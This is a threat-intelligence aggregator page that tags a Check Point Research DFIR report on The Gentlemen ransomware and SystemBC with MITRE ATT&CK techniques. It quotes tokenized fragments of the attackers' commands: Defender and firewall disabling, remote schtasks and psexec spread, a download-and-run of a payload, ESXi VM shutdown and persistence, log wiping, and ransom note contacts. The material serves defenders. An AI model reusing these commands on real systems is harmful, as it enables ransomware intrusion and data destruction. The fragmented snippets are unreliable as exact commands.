TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Check Point Research

DFIR Report – The Gentlemen & SystemBC: A Sneak Peek Behind the Proxy

[email protected] · 2026-04-20 · Read original ↗

ATT&CK techniques detected

111 predictions
T1053.005Scheduled Task
100%
“< hh : mm > / ru system schtasks / run / s < target > / tn updategs schtasks / create / s < target > / tn updategs2 / tr " c : \ \ temp \ \ < exe > < creds > " / sc once / st < hh : mm > / ru system schtasks / run / s < target > / tn updategs2 # services sc \ \ \ \ < target > cre…”
T1490Inhibit System Recovery
100%
“, gif, mp3, nomedia, spl, cpl, adv, icl, msu among the excluded directories, the ransomware explicitly ignores and does not enumerate files under! cynet ransom protection ( don \ \ ' t delete ), where cynet likely places decoy files. by skipping this directory, the ransomware eff…”
T1486Data Encrypted for Impact
100%
“##omputes sharedsecret = x25519 ( attacker _ privkey, ephemeralpubkey ) using the attacker ’ s own private key, and uses the first 24 bytes of sharedsecret2 as the chacha20 nonce. with the key and nonce recovered, it decrypts the encrypted files. the gentlemen esxi variant latest…”
T1486Data Encrypted for Impact
100%
“meta : author = " @ tera0017 / check point research " description = " the gentlemen ransomware written in go. " strings : $ string1 = " silent mode ( don ' t rename files ) " ascii $ string2 = " encrypt only mapped and unc network shares " ascii $ string3 = " readme - gentlemen. …”
T1680Local Storage Discovery
99%
“xml " - force if (! ( test - path $ gposcheduledpath ) ) { # path creation guard } $ comps = get - adcomputer - filter * | select - object - expandproperty name foreach ( $ _ in $ comps ) { invoke - gpupdate - computer $ _. name - randomdelayinminutes 0 - force - erroraction sile…”
T1053.005Scheduled Task
99%
“action = " c " name = " $ taskname " runas = " nt authority \ \ system " logontype = " s4u " / >... < boottrigger > < enabled > true < / enabled > < / boottrigger > < registrationtrigger > < enabled > true < / enabled > < / registrationtrigger > < multipleinstancespolicy > ignore…”
T1053.005Scheduled Task
99%
“\ < host > \ \ share $ \ \ < exe > < creds > " / sc once / st < hh : mm > schtasks / run / s < target > / tn updategu - - remote schtask : updategu2 ( local temp ) - - schtasks / create / s < target > / tn updategu2 / tr " c : \ \ temp \ \ < exe > < creds > " / sc once / st < hh …”
T1486Data Encrypted for Impact
99%
“the desktop wallpaper. file encryption before encryption begins, the ransomware checks whether the file size exceeds 0x100000 ( 1, 048, 576 bytes, or 1 mb ). files of 1 mb or smaller are routed to the small file function, while files larger than 1 mb are routed to the large file …”
T1053.005Scheduled Task
99%
“##oscheduledpath = " \ \ \ \ $ domain \ \ sysvol \ \ $ domain \ \ policies \ \ { $ guid } \ \ machine \ \ preferences \ \ scheduledtasks " new - item - itemtype directory - path $ gposcheduledpath - force | out - null $ taskxmlpath = " $ env : temp \ \ scheduledtasks. xml " $ tas…”
T1053.005Scheduled Task
99%
“##e > - - wmi : run defender disable script - - wmic / node : < target > process call create " < defender _ script _ a > " - - wmi : run via share path - - wmic / node : < target > process call create " \ \ \ \ < host > \ \ share $ \ \ < exe > < creds > " - - wmi : run via local …”
T1135Network Share Discovery
98%
“object { $ _. name - like ' : \ \ ' } | select - object - expandproperty name ; try { $ volumes + = get - clustersharedvolume | foreach - object { $ _. sharedvolumeinfo. friendlyvolumename } } catch { } $ volumes " network enumeration in order to enumerate network drives the rans…”
T1021.002SMB/Windows Admin Shares
98%
“harvested from the environment. these credentials are then reused across all lateral movement operations : psexec receives them via the - u and - p parameters, wmi uses them for remote authentication, and remote scheduled task and service creation, authenticating with them agains…”
T1059.001PowerShell
98%
“system \ \ currentcontrolset \ \ control \ \ lsa ' / v restrictanonymous / t reg _ dword / d 0 / f 2 > $ null " - - remote powershell : script _ c — winrm defender disable + process exclusion ( with creds ) - - powershell - noprofile - executionpolicy bypass - command " invoke - …”
T1489Service Stop
98%
“- - system - - fast example 3 : - - password qwerty - - shares - - t 10 example 4 : - - password qwerty - - full - - ultrafast example 5 : - - password qwerty - - full - - spread " domain \ \ admin : p @ ss " # with credentials example 6 : - - password qwerty - - t 10 - - keep - …”
T1053.005Scheduled Task
97%
“a stop signal to the service right now, killing it immediately if it ’ s currently running. sc stop < service >, sends a stop signal to the service right now, killing it immediately if it ’ s currently running. persistence during execution, the ransomware attempts to establish pe…”
T1486Data Encrypted for Impact
97%
“about victims, likely to increase pressure on them to pay. to date, the group has publicly claimed a little over 320 victims, with the majority of infections occurring in 2026. this growth in activity suggests that the gentlemen raas program has managed to attract a significant n…”
T1053.005Scheduled Task
97%
“system ( hklm ) and for the current user ( hkcu ) : reg add hkcu \ \ software \ \ microsoft \ \ windows \ \ currentversion \ \ run / v gupdateu / t reg _ sz / d " < exe > " / f when the - - spread argument is enabled, the ransomware also attempts to maintain remote persistence on…”
T1486Data Encrypted for Impact
97%
“, state. tgz, useropts. gz conclusion the activity surrounding the gentlemen raas underscores how quickly a well ‑ designed affiliate program can evolve from newcomer to a high ‑ impact ecosystem player. by combining a versatile, multi ‑ platform locker set with built ‑ in latera…”
T1219Remote Access Tools
96%
“\ system \ \ currentcontrolset \ \ control \ \ terminal server / v fdenytsconnections / t reg _ dword / d 0 / f cmd. exe / c netsh advfirewall firewall set rule group = " remote desktop " new enable = yes later, the attacker installed and configured anydesk using : cmd. exe / c a…”
T1486Data Encrypted for Impact
96%
“first 24 bytes of the shared secret ( derived with the attacker ’ s public key ) are used as the nonce. for small files ( less than 1mb ) the contents are encrypted using xchacha20, a stream cipher, which xors the plaintext with a keystream to produce ciphertext of identical leng…”
T1053.005Scheduled Task
96%
“< target > / tn updategs / tr " \ \ \ \ < host > \ \ share $ \ \ < exe > < creds > " / sc once / st < hh : mm > / ru system schtasks / run / s < target > / tn updategs - - remote schtask : updategs2 ( system, local temp ) - - schtasks / create / s < target > / tn updategs2 / tr "…”
T1486Data Encrypted for Impact
95%
“cl application wevtutil cl security del / f / q c : \ \ windows \ \ prefetch \ \ *. * del / f / q c : \ \ programdata \ \ microsoft \ \ windows defender \ \ support \ \ *. * del / f / q % systemroot % \ \ system32 \ \ logfiles \ \ rdp * \ \ *. * free space wiping when the threat …”
T1059.001PowerShell
95%
“_ e — winrm start process via share with args ( with creds, 96 - char template ) - - powershell - noprofile - executionpolicy bypass - command " invoke - command - computername < target > - scriptblock { start - process - filepath ' < \ \ \ \ < host > \ \ share $ \ \ < exe > > ' …”
T1059.012Hypervisor CLI
95%
“##ms ( popen, output parsed line by line ) vim - cmd vmsvc / getallvms | tail - n + 2 # power off each vm gracefully ( one system ( ) call per vm, skipping - - ignore list ) vim - cmd vmsvc / power. off < vmid > > / dev / null 2 > & 1 # after 8 - second sleep : enumerate still - …”
T1090.002External Proxy
95%
“are fake and may be set up by third parties. only use the methods listed in this note or on the specified website. mitre att & ck matrix the post dfir report – the gentlemen & systembc : a sneak peek behind the proxy appeared first on check point research.”
T1486Data Encrypted for Impact
94%
“execution via admin $ shares, and rapid expansion across endpoints. this was accompanied by attempted and successful command - and - control establishment using infrastructure such as 45. 86. 230 [. ] 112 and 91. 107. 247 [. ] 163, staged malware delivery from the internal dc, an…”
T1486Data Encrypted for Impact
93%
“##wallrule then loads dynamically mpr. dll and by using the windows api functions enumerates the networks shares : wnetopenenumw wnetenumresourcew wnetcloseenum directories, filenames and extensions exclusion as with many other ransomware families, this one also excludes specific…”
T1059.012Hypervisor CLI
93%
“- path $ path ( s ) vm & processes termination ransomware operators shut down virtual machines on an esxi host to make their attack more effective and efficient. by powering off the vms, they release locks on virtual disk files, allowing those files to be encrypted more reliably …”
T1564.006Run Virtual Instance
92%
“/ dev / null pre - encryption preparation the ransomware modifies a vmware esxi host to prepare the storage layer for fast, consistent disk writes and then disables automatic vm recovery. it increases the vmfs write buffer capacity and adjusts the flush interval to control how da…”
T1486Data Encrypted for Impact
88%
“/ www. torproject. org / download / > follow us on x : hxxps : / / x. com / thegentlemen25 any other means of communication are fake and may be set up by third parties. only use the methods listed in this note or on the specified website. after adding ( us ) in tox or session, pl…”
T1486Data Encrypted for Impact
87%
“- path dir target directories, comma - separated ( required ) example : - - path / vmfs / example2 : - - path " / vmfs /, / datastore /, / mnt / storage " - - ignore vms vm display names to ignore, comma - separated ( optional ) example : - - ignore domaincontroller example2 : - …”
T1486Data Encrypted for Impact
86%
“/ dev / null pre - encryption preparation the ransomware modifies a vmware esxi host to prepare the storage layer for fast, consistent disk writes and then disables automatic vm recovery. it increases the vmfs write buffer capacity and adjusts the flush interval to control how da…”
T1486Data Encrypted for Impact
86%
“the go programming language. it appears to be under active development, with new features and capabilities being continuously added over time. command line arguments the gentlemen ransomware exposes a wide range of command ‑ line options that provide numerous features to its oper…”
T1679Selective Exclusion
86%
“program files \ \ \ \ windows ", " c : \ \ \ \ program files ( x86 ) \ \ \ \ windows ", " c : \ \ \ \ program files \ \ \ \ intel ", " tor browser ", " boot ", " config. msi ", " google ", " system32 ", " perflogs ", " appdata ", " windows. old " excluded extensions : hemepack, n…”
T1053.005Scheduled Task
86%
“capabilities. on one compromised host, it staged the tool socks. exe – identified as a variant of systembc – was executed and attempted to communicate with 45. 86. 230 [. ] 112, followed by validation using cmd. exe / c tasklist | findstr / i socks. this tool is commonly used to …”
T1679Selective Exclusion
85%
“##wallrule then loads dynamically mpr. dll and by using the windows api functions enumerates the networks shares : wnetopenenumw wnetenumresourcew wnetcloseenum directories, filenames and extensions exclusion as with many other ransomware families, this one also excludes specific…”
T1490Inhibit System Recovery
85%
“cl application wevtutil cl security del / f / q c : \ \ windows \ \ prefetch \ \ *. * del / f / q c : \ \ programdata \ \ microsoft \ \ windows defender \ \ support \ \ *. * del / f / q % systemroot % \ \ system32 \ \ logfiles \ \ rdp * \ \ *. * free space wiping when the threat …”
T1059.001PowerShell
82%
“http : / / [ redacted _ domain _ controller ] : 8080 / grand. exe ', ' c : \ \ programdata \ \ r. exe ' ) ; c : \ \ programdata \ \ r. exe - - password vvo8etuh - - spread [ redacted _ domain ] \ \ [ redacted _ user ] : [ redacted _ password ] this command downloaded grand. exe (…”
T1673Virtual Machine Discovery
82%
“- path $ path ( s ) vm & processes termination ransomware operators shut down virtual machines on an esxi host to make their attack more effective and efficient. by powering off the vms, they release locks on virtual disk files, allowing those files to be encrypted more reliably …”
T1080Taint Shared Content
81%
“execution via admin $ shares, and rapid expansion across endpoints. this was accompanied by attempted and successful command - and - control establishment using infrastructure such as 45. 86. 230 [. ] 112 and 91. 107. 247 [. ] 163, staged malware delivery from the internal dc, an…”
T1486Data Encrypted for Impact
80%
“570 victims, with the majority located in the united states, followed by the united kingdom and germany. whether systembc is directly integrated into the gentlemen ransomware ecosystem or is simply a tool leveraged by this particular affiliate for exfiltration and remote access r…”
T1021.002SMB/Windows Admin Shares
79%
“c / h / r / k - - psexec : disable defender on target ( with credentials ) - - psexec \ \ \ \ < target > - accepteula - d - s - u < domain \ \ user > - p < pass > cmd / c < defender _ script _ a > - - psexec : disable defender on target ( no credentials ) - - psexec \ \ \ \ < tar…”
T1679Selective Exclusion
79%
“full command lines for the - - spread argument are provided further below. antivirus evasion the ransomware executes three powershell commands to disable microsoft defender protection and exclude both itself and the entire c : \ \ drive from scanning and monitoring : powershell -…”
T1486Data Encrypted for Impact
78%
“dfir report – the gentlemen & systembc : a sneak peek behind the proxy key points the gentlemen ransomware ‑ as ‑ a ‑ service ( raas ) program is rapidly gaining popularity, attracting numerous affiliates and publicly claiming over 320 victims, with the majority of attacks ( 240 …”
T1486Data Encrypted for Impact
77%
“encrypt only mapped network drives and available unc shares in session context ( optional ) - - full two - phase : - - system + - - shares. best practice. ( optional ) additional flags - - spread creds lateral movement : " domain / user : pass " with creds, or " " for current ses…”
T1585.001Social Media Accounts
77%
“is a relatively new group that emerged around mid ‑ 2025. the operators advertise their services across multiple underground forums, promoting their ransomware platform and inviting penetration testers ( and other technically skilled actors ) to join as affiliates. the raas provi…”
T1486Data Encrypted for Impact
77%
“inf, bootmgr, hiberfil. sys, bootmgr. efi, bootmgfw. efi, # recycle, readme - gentlemen. txt " c : \ \ \ \ windows ", " system volume information ", " c : \ \ \ \ intel ", " admin $ ", " ipc $ ", "! cynet ransom protection ( don \ \ ' t delete ) ", " sysvol ", " netlogon ", " $ w…”
T1027.013Encrypted/Encoded File
76%
“encryption, the function appends a footer to the file containing the string - - eph - -, followed by the base64 - encoded ephemeral public key and a newline. this is followed by a marker section - - marker - - gentlemen \ \ n and a final gentlemen sentinel. the stored ephemeral p…”
T1078Valid Accounts
74%
“570 victims, with the majority located in the united states, followed by the united kingdom and germany. whether systembc is directly integrated into the gentlemen ransomware ecosystem or is simply a tool leveraged by this particular affiliate for exfiltration and remote access r…”
T1027Obfuscated Files or Information
74%
“encryption, the function appends a footer to the file containing the string - - eph - -, followed by the base64 - encoded ephemeral public key and a newline. this is followed by a marker section - - marker - - gentlemen \ \ n and a final gentlemen sentinel. the stored ephemeral p…”
T1686.003Windows Host Firewall
74%
“executable. during lateral movement, the ransomware makes an attempt to blind windows defender on each reachable remote host by pushing a powershell script that disables real - time monitoring, adds broad exclusions for the drive, staging share, and its own process, shuts down th…”
T1505.004IIS Components
73%
“capabilities. on one compromised host, it staged the tool socks. exe – identified as a variant of systembc – was executed and attempted to communicate with 45. 86. 230 [. ] 112, followed by validation using cmd. exe / c tasklist | findstr / i socks. this tool is commonly used to …”
T1090.002External Proxy
72%
“##2cba43a1af6d965432ae11487726db84d2945cf2cd975d7774b76b54af052418ac2e59ada69 download tox messenger : < https : / / tox. chat / download. html > contact us ( add via session id ) : { session _ id } download session < https : / / getsession. org > сontact to prevent data leak ( 7…”
T1053.005Scheduled Task
71%
“##voke - command - computername < target > - scriptblock { start - process - filepath ' c : \ \ temp \ \ < exe > ' - argumentlist ' < creds > ' } " script _ a ( defender disable — used inline by psexec and wmi calls ) - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - …”
T1053.003Cron
71%
“/ dev / null & & chmod + x ' / bin /. vmware - authd ' then creates a script file that esxi runs at boot. mkdir - p / etc / rc. local. d 2 > / dev / null ; \ \ echo ' #! / bin / sh ' > ' / etc / rc. local. d / local. sh ' ; \ \ echo ' sleep 30 & & / bin /. vmware - authd < origin…”
T1112Modify Registry
70%
“executable. during lateral movement, the ransomware makes an attempt to blind windows defender on each reachable remote host by pushing a powershell script that disables real - time monitoring, adds broad exclusions for the drive, staging share, and its own process, shuts down th…”
T1486Data Encrypted for Impact
70%
“is a relatively new group that emerged around mid ‑ 2025. the operators advertise their services across multiple underground forums, promoting their ransomware platform and inviting penetration testers ( and other technically skilled actors ) to join as affiliates. the raas provi…”
T1486Data Encrypted for Impact
68%
“http : / / [ redacted _ domain _ controller ] : 8080 / grand. exe ', ' c : \ \ programdata \ \ r. exe ' ) ; c : \ \ programdata \ \ r. exe - - password vvo8etuh - - spread [ redacted _ domain ] \ \ [ redacted _ user ] : [ redacted _ password ] this command downloaded grand. exe (…”
T1005Data from Local System
67%
“can provide three sample files, and we will restore them free of charge. tox contact - recover your files contact us ( add via tox id ) : d527959a7bc728cb272a0db683b547f079c98012201a48dd2792b84604e8bc29f6e6bdb8003f download tox messenger : < https : / / tox. chat / download. html…”
T1055.001Dynamic-link Library Injection
66%
“http : / / [ redacted _ domain _ controller ] : 8080 / grand. exe ', ' c : \ \ programdata \ \ r. exe ' ) ; c : \ \ programdata \ \ r. exe - - password vvo8etuh - - spread [ redacted _ domain ] \ \ [ redacted _ user ] : [ redacted _ password ] this command downloaded grand. exe (…”
T1482Domain Trust Discovery
66%
“mechanism after the systembc attempt was blocked. credential access and continued discovery compromised hosts were also used for credential harvesting. mimikatz output recovered from memory on one of the compromised endpoints showed access to credential material, including domain…”
T1219.002Remote Desktop Software
65%
“\ system \ \ currentcontrolset \ \ control \ \ terminal server / v fdenytsconnections / t reg _ dword / d 0 / f cmd. exe / c netsh advfirewall firewall set rule group = " remote desktop " new enable = yes later, the attacker installed and configured anydesk using : cmd. exe / c a…”
T1080Taint Shared Content
64%
“about victims, likely to increase pressure on them to pay. to date, the group has publicly claimed a little over 320 victims, with the majority of infections occurring in 2026. this growth in activity suggests that the gentlemen raas program has managed to attract a significant n…”
T1550.002Pass the Hash
63%
“mechanism after the systembc attempt was blocked. credential access and continued discovery compromised hosts were also used for credential harvesting. mimikatz output recovered from memory on one of the compromised endpoints showed access to credential material, including domain…”
T1021.002SMB/Windows Admin Shares
63%
“##d / c net share share $ = c : \ \ temp / grant : everyone, full cmd / c icacls c : \ \ temp / grant " anonymous logon " : f cmd / c reg add hklm \ \ system \ \ currentcontrolset \ \ services \ \ lanmanserver \ \ parameters / v nullsessionshares / t reg _ multi _ sz / d share $ …”
T1059.012Hypervisor CLI
62%
“##mkfstools - u $ i / eztdisk > / dev / null 2 > & 1 ; \ \ done 2 > & 1 # clear esxi vm autostart configuration ( prevents vms from restarting ) vim - cmd hostsvc / autostartmanager / clear _ autostart > / dev / null 2 > & 1 # disable autostart manager entirely vim - cmd hostsvc …”
T1585Establish Accounts
62%
“dfir report – the gentlemen & systembc : a sneak peek behind the proxy key points the gentlemen ransomware ‑ as ‑ a ‑ service ( raas ) program is rapidly gaining popularity, attracting numerous affiliates and publicly claiming over 320 victims, with the majority of attacks ( 240 …”
T1564.006Run Virtual Instance
60%
“##mkfstools - u $ i / eztdisk > / dev / null 2 > & 1 ; \ \ done 2 > & 1 # clear esxi vm autostart configuration ( prevents vms from restarting ) vim - cmd hostsvc / autostartmanager / clear _ autostart > / dev / null 2 > & 1 # disable autostart manager entirely vim - cmd hostsvc …”
T1059.003Windows Command Shell
60%
“shares such as \ \ \ \ [ redacted _ hostname ] \ \ admin $ \ \ < random _ 7 _ char >. exe and executing them via rpc. the first observed deployment occurred on an internal endpoint, after which similar activity appeared across additional hosts. early post - compromise actions inc…”
T1486Data Encrypted for Impact
59%
“- - system - - fast example 3 : - - password qwerty - - shares - - t 10 example 4 : - - password qwerty - - full - - ultrafast example 5 : - - password qwerty - - full - - spread " domain \ \ admin : p @ ss " # with credentials example 6 : - - password qwerty - - t 10 - - keep - …”
T1003OS Credential Dumping
57%
“mechanism after the systembc attempt was blocked. credential access and continued discovery compromised hosts were also used for credential harvesting. mimikatz output recovered from memory on one of the compromised endpoints showed access to credential material, including domain…”
T1021.001Remote Desktop Protocol
57%
“shares such as \ \ \ \ [ redacted _ hostname ] \ \ admin $ \ \ < random _ 7 _ char >. exe and executing them via rpc. the first observed deployment occurred on an internal endpoint, after which similar activity appeared across additional hosts. early post - compromise actions inc…”
T1059.012Hypervisor CLI
55%
“/ dev / null & & chmod + x ' / bin /. vmware - authd ' then creates a script file that esxi runs at boot. mkdir - p / etc / rc. local. d 2 > / dev / null ; \ \ echo ' #! / bin / sh ' > ' / etc / rc. local. d / local. sh ' ; \ \ echo ' sleep 30 & & / bin /. vmware - authd < origin…”
T1080Taint Shared Content
54%
“, state. tgz, useropts. gz conclusion the activity surrounding the gentlemen raas underscores how quickly a well ‑ designed affiliate program can evolve from newcomer to a high ‑ impact ecosystem player. by combining a versatile, multi ‑ platform locker set with built ‑ in latera…”
T1486Data Encrypted for Impact
53%
“##mkfstools - u $ i / eztdisk > / dev / null 2 > & 1 ; \ \ done 2 > & 1 # clear esxi vm autostart configuration ( prevents vms from restarting ) vim - cmd hostsvc / autostartmanager / clear _ autostart > / dev / null 2 > & 1 # disable autostart manager entirely vim - cmd hostsvc …”
T1090.001Internal Proxy
51%
“capabilities. on one compromised host, it staged the tool socks. exe – identified as a variant of systembc – was executed and attempted to communicate with 45. 86. 230 [. ] 112, followed by validation using cmd. exe / c tasklist | findstr / i socks. this tool is commonly used to …”
T1675ESXi Administration Command
50%
“- path $ path ( s ) vm & processes termination ransomware operators shut down virtual machines on an esxi host to make their attack more effective and efficient. by powering off the vms, they release locks on virtual disk files, allowing those files to be encrypted more reliably …”
T1484.001Group Policy Modification
49%
“netfirewallprofile - profile domain, public, private - enabled false ; enable - windowsoptionalfeature - online - featurename smb1protocol - norestart 2 > $ null ; reg add hklm \ \ system \ \ currentcontrolset \ \ control \ \ lsa / v everyoneincludesanonymous / t reg _ dword / d …”
T1685Disable or Modify Tools
48%
“executable. during lateral movement, the ransomware makes an attempt to blind windows defender on each reachable remote host by pushing a powershell script that disables real - time monitoring, adds broad exclusions for the drive, staging share, and its own process, shuts down th…”
T1059.001PowerShell
48%
“##voke - command - computername < target > - scriptblock { start - process - filepath ' c : \ \ temp \ \ < exe > ' - argumentlist ' < creds > ' } " script _ a ( defender disable — used inline by psexec and wmi calls ) - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - …”
T1053.005Scheduled Task
47%
“set - mppreference - disablerealtimemonitoring $ true - force this disabled windows defender real - time monitoring. the same payload, identified by a consistent hash, then appeared across numerous systems under different filenames, including c : \ \ programdata \ \ r. exe, c : \…”
T1675ESXi Administration Command
47%
“##ms ( popen, output parsed line by line ) vim - cmd vmsvc / getallvms | tail - n + 2 # power off each vm gracefully ( one system ( ) call per vm, skipping - - ignore list ) vim - cmd vmsvc / power. off < vmid > > / dev / null 2 > & 1 # after 8 - second sleep : enumerate still - …”
T1059.001PowerShell
47%
“= " \ \ \ \ < host > \ \ share $ \ \ < exe > < creds > " sc \ \ \ \ < target > start updatesvc - - remote service : updatesvc2 ( local temp ) - - sc \ \ \ \ < target > create updatesvc2 binpath = " c : \ \ temp \ \ < exe > < creds > " sc \ \ \ \ < target > start updatesvc2 - - re…”
T1673Virtual Machine Discovery
46%
“##ms ( popen, output parsed line by line ) vim - cmd vmsvc / getallvms | tail - n + 2 # power off each vm gracefully ( one system ( ) call per vm, skipping - - ignore list ) vim - cmd vmsvc / power. off < vmid > > / dev / null 2 > & 1 # after 8 - second sleep : enumerate still - …”
T1090.002External Proxy
46%
“capabilities. on one compromised host, it staged the tool socks. exe – identified as a variant of systembc – was executed and attempted to communicate with 45. 86. 230 [. ] 112, followed by validation using cmd. exe / c tasklist | findstr / i socks. this tool is commonly used to …”
T1679Selective Exclusion
46%
“- path dir target directories, comma - separated ( required ) example : - - path / vmfs / example2 : - - path " / vmfs /, / datastore /, / mnt / storage " - - ignore vms vm display names to ignore, comma - separated ( optional ) example : - - ignore domaincontroller example2 : - …”
T1070.004File Deletion
45%
“inf, bootmgr, hiberfil. sys, bootmgr. efi, bootmgfw. efi, # recycle, readme - gentlemen. txt " c : \ \ \ \ windows ", " system volume information ", " c : \ \ \ \ intel ", " admin $ ", " ipc $ ", "! cynet ransom protection ( don \ \ ' t delete ) ", " sysvol ", " netlogon ", " $ w…”
T1585.002Email Accounts
44%
“is a relatively new group that emerged around mid ‑ 2025. the operators advertise their services across multiple underground forums, promoting their ransomware platform and inviting penetration testers ( and other technically skilled actors ) to join as affiliates. the raas provi…”
T1485Data Destruction
43%
“inf, bootmgr, hiberfil. sys, bootmgr. efi, bootmgfw. efi, # recycle, readme - gentlemen. txt " c : \ \ \ \ windows ", " system volume information ", " c : \ \ \ \ intel ", " admin $ ", " ipc $ ", "! cynet ransom protection ( don \ \ ' t delete ) ", " sysvol ", " netlogon ", " $ w…”
T1559.001Component Object Model
39%
“capabilities. on one compromised host, it staged the tool socks. exe – identified as a variant of systembc – was executed and attempted to communicate with 45. 86. 230 [. ] 112, followed by validation using cmd. exe / c tasklist | findstr / i socks. this tool is commonly used to …”
T1059.012Hypervisor CLI
39%
“/ dev / null pre - encryption preparation the ransomware modifies a vmware esxi host to prepare the storage layer for fast, consistent disk writes and then disables automatic vm recovery. it increases the vmfs write buffer capacity and adjusts the flush interval to control how da…”
T1588.001Malware
38%
“dfir report – the gentlemen & systembc : a sneak peek behind the proxy key points the gentlemen ransomware ‑ as ‑ a ‑ service ( raas ) program is rapidly gaining popularity, attracting numerous affiliates and publicly claiming over 320 victims, with the majority of attacks ( 240 …”
T1053Scheduled Task/Job
37%
“a stop signal to the service right now, killing it immediately if it ’ s currently running. sc stop < service >, sends a stop signal to the service right now, killing it immediately if it ’ s currently running. persistence during execution, the ransomware attempts to establish pe…”
T1564.006Run Virtual Instance
37%
“cl application wevtutil cl security del / f / q c : \ \ windows \ \ prefetch \ \ *. * del / f / q c : \ \ programdata \ \ microsoft \ \ windows defender \ \ support \ \ *. * del / f / q % systemroot % \ \ system32 \ \ logfiles \ \ rdp * \ \ *. * free space wiping when the threat …”
T1053.005Scheduled Task
37%
“full command lines for the - - spread argument are provided further below. antivirus evasion the ransomware executes three powershell commands to disable microsoft defender protection and exclude both itself and the entire c : \ \ drive from scanning and monitoring : powershell -…”
T1021.002SMB/Windows Admin Shares
36%
“\ lsa / v everyoneincludesanonymous / t reg _ dword / d 1 / f reg add... \ \ lsa / v restrictanonymous / t reg _ dword / d 0 / f windows firewall the ransomware tries to disable the firewall to allow unrestricted outbound and inbound traffic. this enables lateral movement tools (…”
T1486Data Encrypted for Impact
36%
“full command lines for the - - spread argument are provided further below. antivirus evasion the ransomware executes three powershell commands to disable microsoft defender protection and exclude both itself and the entire c : \ \ drive from scanning and monitoring : powershell -…”
T1059.001PowerShell
36%
“full command lines for the - - spread argument are provided further below. antivirus evasion the ransomware executes three powershell commands to disable microsoft defender protection and exclude both itself and the entire c : \ \ drive from scanning and monitoring : powershell -…”
T1078.002Domain Accounts
35%
“570 victims, with the majority located in the united states, followed by the united kingdom and germany. whether systembc is directly integrated into the gentlemen ransomware ecosystem or is simply a tool leveraged by this particular affiliate for exfiltration and remote access r…”
T1588.001Malware
35%
“, state. tgz, useropts. gz conclusion the activity surrounding the gentlemen raas underscores how quickly a well ‑ designed affiliate program can evolve from newcomer to a high ‑ impact ecosystem player. by combining a versatile, multi ‑ platform locker set with built ‑ in latera…”
T1564.006Run Virtual Instance
35%
“vmfs - 5 datastore ( forces buffer flush before encryption — ensures plaintext is written to disk ) for i in $ ( esxcli storage filesystem list | grep ' vmfs - 5 ' | awk ' { print $ 1 } ' ) ; do \ \ vmkfstools - c 10m - d eagerzeroedthick $ i / eztdisk > / dev / null 2 > & 1 ; \ …”
T1021.001Remote Desktop Protocol
33%
“set - mppreference - disablerealtimemonitoring $ true - force this disabled windows defender real - time monitoring. the same payload, identified by a consistent hash, then appeared across numerous systems under different filenames, including c : \ \ programdata \ \ r. exe, c : \…”
T1585Establish Accounts
33%
“, state. tgz, useropts. gz conclusion the activity surrounding the gentlemen raas underscores how quickly a well ‑ designed affiliate program can evolve from newcomer to a high ‑ impact ecosystem player. by combining a versatile, multi ‑ platform locker set with built ‑ in latera…”
T1486Data Encrypted for Impact
32%
“, gif, mp3, nomedia, spl, cpl, adv, icl, msu among the excluded directories, the ransomware explicitly ignores and does not enumerate files under! cynet ransom protection ( don \ \ ' t delete ), where cynet likely places decoy files. by skipping this directory, the ransomware eff…”
T1564.012File/Path Exclusions
32%
“full command lines for the - - spread argument are provided further below. antivirus evasion the ransomware executes three powershell commands to disable microsoft defender protection and exclude both itself and the entire c : \ \ drive from scanning and monitoring : powershell -…”
T1569.002Service Execution
32%
“c / h / r / k - - psexec : disable defender on target ( with credentials ) - - psexec \ \ \ \ < target > - accepteula - d - s - u < domain \ \ user > - p < pass > cmd / c < defender _ script _ a > - - psexec : disable defender on target ( no credentials ) - - psexec \ \ \ \ < tar…”
T1491.001Internal Defacement
31%
“cl application wevtutil cl security del / f / q c : \ \ windows \ \ prefetch \ \ *. * del / f / q c : \ \ programdata \ \ microsoft \ \ windows defender \ \ support \ \ *. * del / f / q % systemroot % \ \ system32 \ \ logfiles \ \ rdp * \ \ *. * free space wiping when the threat …”
T1547.001Registry Run Keys / Startup Folder
31%
“a stop signal to the service right now, killing it immediately if it ’ s currently running. sc stop < service >, sends a stop signal to the service right now, killing it immediately if it ’ s currently running. persistence during execution, the ransomware attempts to establish pe…”
T1059.001PowerShell
31%
“executable. during lateral movement, the ransomware makes an attempt to blind windows defender on each reachable remote host by pushing a powershell script that disables real - time monitoring, adds broad exclusions for the drive, staging share, and its own process, shuts down th…”
T1021.002SMB/Windows Admin Shares
31%
“##process ' < exe > ' ; set - netfirewallprofile - profile domain, public, private - enabled false ; get - psdrive - psprovider filesystem | where - object { $ _. name - match ' ^ [ a - z ] $ ' } | foreach - object { $ d = $ _. name ; net share ( $ d + ' $ ' ) = ( $ d + ' : \ \ '…”
T1080Taint Shared Content
30%
“http : / / [ redacted _ domain _ controller ] : 8080 / grand. exe ', ' c : \ \ programdata \ \ r. exe ' ) ; c : \ \ programdata \ \ r. exe - - password vvo8etuh - - spread [ redacted _ domain ] \ \ [ redacted _ user ] : [ redacted _ password ] this command downloaded grand. exe (…”

Summary

Key Points The Gentlemen RaaS The Gentlemen ransomware‑as‑a‑service (RaaS) operation is a relatively new group that emerged around mid‑2025. The operators advertise their services across multiple underground forums, promoting their ransomware platform and inviting penetration testers (and other technically skilled actors) to join as affiliates. The RaaS provides affiliates with multi‑OS lockers for Windows, Linux, […]

The post DFIR Report – The Gentlemen & SystemBC: A Sneak Peek Behind the Proxy appeared first on Check Point Research.